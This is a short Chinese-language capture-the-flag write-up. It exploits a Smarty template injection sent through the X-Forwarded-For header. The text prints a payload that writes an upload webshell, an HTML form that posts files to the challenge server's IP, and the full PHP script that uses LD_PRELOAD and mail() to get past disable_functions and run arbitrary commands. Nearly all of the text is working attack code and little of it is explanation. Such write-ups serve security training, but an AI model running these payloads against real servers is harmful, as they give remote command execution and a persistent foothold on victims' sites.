根据题目提示猜测是smarty模板注入漏洞
测试如下 X-Forwarded-For:{9*9}
测试发现system命令不能执行,eval不能执行,file_get_contents不能通外网,所以想上传shell就写了一个上传的php文件
X-Forwarded-For:{file_put_contents('./up.php','<?php move_uploaded_file($_FILES["file"]["tmp_name"],$_POST[0]);')}然后写个html上传文件
<form action="http://220.249.52.133:58479/up.php" enctype="multipart/form-data" method="post" name="uploadform"> <input type="file" name="file" value="Upload File"> <input type="text" name="0" value="1"> <input type="submit" name="submit" value="Upload"> </form>
把bypass_disablefunc.so上传上去
再把执行脚本上传上去
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>得到flag
